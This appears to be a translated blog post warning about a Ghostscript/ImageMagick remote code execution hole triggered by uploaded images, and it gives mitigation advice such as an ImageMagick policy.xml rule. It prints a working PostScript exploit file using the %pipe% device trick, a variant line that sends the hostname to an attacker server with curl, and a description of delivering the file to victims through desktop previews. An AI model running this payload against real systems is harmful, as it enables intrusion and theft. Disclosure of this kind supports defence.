Remote code execution via uploading pictures on your server or local computer to ghostscript / imagick

    Briefly: if you have images on your site and process them using the popular ImageMagick library, you can download a picture by executing a shell command with the rights of the web server user (for example, download RAT, miner, merge sources, access the database, cause failure, etc.)

    It is strange that the news ( original ) about new holes in the GhostScript library and, as a result, many other libraries that use it under the hood , passed by the Hubs community . So what do we have?

    How to check that your server is vulnerable?

    We take and load the test .ps file on the server instead of the picture. The sample file below does not hurt much - it only makes a 5-second delay. If the server responds longer than 5 seconds, then you have a problem: either your service is vulnerable or it is soooo slow =)

    %!PS% This is ghostscript bug 699714, a variant of 699687 (which is itself a variant of 699654).
    userdict /setpagedevice undef
    a4
    currentpagedevice /HWResolution get 0 (foobar) put
    { grestore } stopped clear
    % make sure we have a device with OutputFile
    (ppmraw) selectdevice
    mark /OutputFile (%pipe% `sleep 5`) currentdevice putdeviceprops
    { showpage } stopped pop
    quit
    

    Key command: sleep 5

    Alternative command can be

    mark /OutputFile (%pipe% curl evilserver.su/GHOSTSCRIPT-RCE-HOOK/`hostname`) currentdevice putdeviceprops

    or something much less harmless.

    Operation vectors set. In addition to downloading to the image handler, you can simply send a link to the .ps file to the victim, and since in most OSs, when you save it to your computer, a preview is created, it also causes exploitation (checked personally on the Linux desktop). At the time of writing, no antivirus detects test .ps files as dangerous.

    What to do?

    Unfortunately, in spite of the publication of information about the vulnerability and the correction of the error, there may be no corrected version in the updates of the distributions.

    On servers, you can make a preliminary check of the type of the image by a third-party library, filter through the policymap ImageMagick / policy.xml file and not process the vulnerable file types. Also, SELinux should close part of the attack vectors, for example, writing to non-standard folders.

    UPD: in the comments they write that the vulnerability is still not fixed in the library!

    UPD2: fix for fix for imagemagick to prohibit the use of PostScript and PDF files from elvenpath : in /etc/ImageMagick-6/policy.xml or /etc/ImageMagick-7/policy.xml depending on the version of ImageMagick you need to write
    <policymap><policydomain="coder"rights="none"pattern="{EPS,PS2,PS3,PS,PDF,XPS}" /></policymap>

    Only registered users can participate in the survey. Sign in , please.

    Did you check your server?


    Also popular now: